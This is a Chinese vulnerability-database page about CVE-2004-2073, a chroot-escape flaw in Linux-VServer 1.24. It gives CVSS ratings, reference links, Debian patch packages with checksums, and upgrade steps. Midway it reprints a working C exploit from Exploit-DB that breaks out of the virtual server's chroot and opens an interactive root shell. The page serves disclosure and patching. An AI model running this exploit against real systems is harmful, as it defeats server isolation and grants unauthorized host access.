CVE-2004-2073
CVSS7.2
发布时间 :2004-02-06 00:00:00
修订时间 :2008-09-05 16:43:07
NMCOE    

[原文]Linux-VServer 1.24 allows local users with root privileges on a virtual server to gain access to the filesystem outside the virtual server via a modified chroot-again exploit using the chmod command.


[CNNVD]Linux VServer Project可突破CHROOT环境漏洞(CNNVD-200402-030)

        
        Linux-VServer是一个允许用户在一个普通的Linux服务器上建立虚拟专用的服务器的软件。
        Linux-VServer存在典型的"chroot-again"问题,本地攻击者可以利用这个漏洞以ROOT用户权限在系统上执行任意指令。
        主要问题是VServer应用程序针对"chroot-again"类型的攻击没有很好的进行安全保护,攻击者可以利用这个漏洞脱离限制环境,访问限制目录之外的任意文件。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2073
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2073
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-030
(官方数据源) CNNVD

- 其它链接及资源

http://www.linux-vserver.org/index.php?page=ChangeLog
(VENDOR_ADVISORY)  CONFIRM  http://www.linux-vserver.org/index.php?page=ChangeLog
http://xforce.iss.net/xforce/xfdb/15073
(VENDOR_ADVISORY)  XF  linux-vserver-gain-privileges(15073)
http://www.securityfocus.com/bid/9596
(VENDOR_ADVISORY)  BID  9596
http://www.securityfocus.com/archive/1/353003
(VENDOR_ADVISORY)  BUGTRAQ  20040206 Linux 2.4.24 with vserver 1.24 exploit
http://www.osvdb.org/3875
(UNKNOWN)  OSVDB  3875
http://secunia.com/advisories/10816
(UNKNOWN)  SECUNIA  10816

- 漏洞信息

Linux VServer Project可突破CHROOT环境漏洞
高危 其他
2004-02-06 00:00:00 2005-10-20 00:00:00
本地  
        
        Linux-VServer是一个允许用户在一个普通的Linux服务器上建立虚拟专用的服务器的软件。
        Linux-VServer存在典型的"chroot-again"问题,本地攻击者可以利用这个漏洞以ROOT用户权限在系统上执行任意指令。
        主要问题是VServer应用程序针对"chroot-again"类型的攻击没有很好的进行安全保护,攻击者可以利用这个漏洞脱离限制环境,访问限制目录之外的任意文件。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-1011-1)以及相应补丁:
        DSA-1011-1:New kernel-patch-vserver packages fix root exploit
        链接:
        http://www.debian.org/security/2005/dsa-1011

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/main/k/kernel-patch-vserver/kernel-patch-vserver_1.9.5.5.dsc

        Size/MD5 checksum: 637 415731be72a9cd966e2fdb5d4f408c4a
        
        http://security.debian.org/pool/updates/main/k/kernel-patch-vserver/kernel-patch-vserver_1.9.5.5.tar.gz

        Size/MD5 checksum: 950447 fe6b34612095d2fbdbaab5aefbd83264
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3.dsc

        Size/MD5 checksum: 752 e32069a5ca2ef2bc87794cd6c2160821
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3.diff.gz

        Size/MD5 checksum: 115947 d0bb2cd998a73905189ee24b5f46dd0d
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204.orig.tar.gz

        Size/MD5 checksum: 677831 b315f375b1cef48da1b644dec18f22bd
        Architecture independent components:
        
        http://security.debian.org/pool/updates/main/k/kernel-patch-vserver/kernel-patch-vserver_1.9.5.5_all.deb

        Size/MD5 checksum: 436934 b50048ea819d150d660ed96e3988613b
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_alpha.deb

        Size/MD5 checksum: 600660 e52fe0ff93e4c9ca7d58fe8386ebab5a
        AMD64 architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_amd64.deb

        Size/MD5 checksum: 429530 c4155982844c085b7d9bc59d7eaa02c4
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_i386.deb

        Size/MD5 checksum: 398794 56831faa6fa6d76c601fee78251f50eb
        Intel IA-64 architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_ia64.deb

        Size/MD5 checksum: 640332 ab2b2e4283ca5b62c9d9cf5776b6dadb
        Big endian MIPS architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_mips.deb

        Size/MD5 checksum: 612918 e4a60532f25ce776880261de79278e85
        Little endian MIPS architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_mipsel.deb

        Size/MD5 checksum: 614152 f3aee29aad2682878f8ed22064f3fafa
        PowerPC architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_powerpc.deb

        Size/MD5 checksum: 425444 9a7542249c2b70661abab2afd5270462
        IBM S/390 architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_s390.deb

        Size/MD5 checksum: 440880 376560971a0d2db4bfd51beb67d42bff
        Sun Sparc architecture:
        
        http://security.debian.org/pool/updates/main/u/util-vserver/util-vserver_0.30.204-5sarge3_sparc.deb

        Size/MD5 checksum: 395640 51e24ac4754b1aa41277378ee9271a1f
        补丁安装方法:
        1. 手工安装补丁包:
         首先,使用下面的命令来下载补丁软件:
         # wget url (url是补丁下载链接地址)
         然后,使用下面的命令来安装补丁:
         # dpkg -i file.deb (file是相应的补丁名)
        2. 使用apt-get自动安装补丁包:
         首先,使用下面的命令更新内部数据库:
         # apt-get update
        
         然后,使用下面的命令安装更新软件包:
         # apt-get upgrade
        VServer
        -------
        
        http://www.debian.org/security/2006/dsa-1011

- 漏洞信息 (23658)

Linux VServer Project 1.2x CHRoot Breakout Vulnerability (EDBID:23658)
linux local
2004-02-06 Verified
0 Markus Mueller
N/A [点击下载]
source: http://www.securityfocus.com/bid/9596/info

VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory.

/* vserver@deadbeef.de modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */

#include <sys/types.h>
#include <sys/stat.h>

main()
{
int i;

if (chdir("/") != 0) {
  perror("cd /"); exit(1);
}
if (mkdir("baz", 0777) != 0) {
  perror("mkdir baz");
}
if (chroot("baz") != 0) {
  perror("chroot baz"); exit(1);
}

for (i=0; i<50; i++) {
   if (chdir("..") != 0) {
      perror("cd .."); /* exit(1); */
   }
   if (chmod("..", S_IXOTH) != 0) {
      perror("chmod"); /* exit(1); */
   }
}
if (chroot(".") != 0) {
  perror("chroot ."); exit(1);
}
printf("Exploit seems to work. =)\n");
execl("/bin/sh", "sh", "-i", (char *)0);
perror("exec sh");
exit(0);
}
		

- 漏洞信息

3875
Linux VServer Chroot Escape
Local Access Required Authentication Management, Other
Exploit Public

- 漏洞描述

Linux-Vserver contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when an attacker breaks the chroot jail and is able to traverse other directories. This flaw may lead to a loss of confidentiality.

- 时间线

2004-02-06 2004-02-06
Unknow Unknow

- 解决方案

Upgrade to version 1.25 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站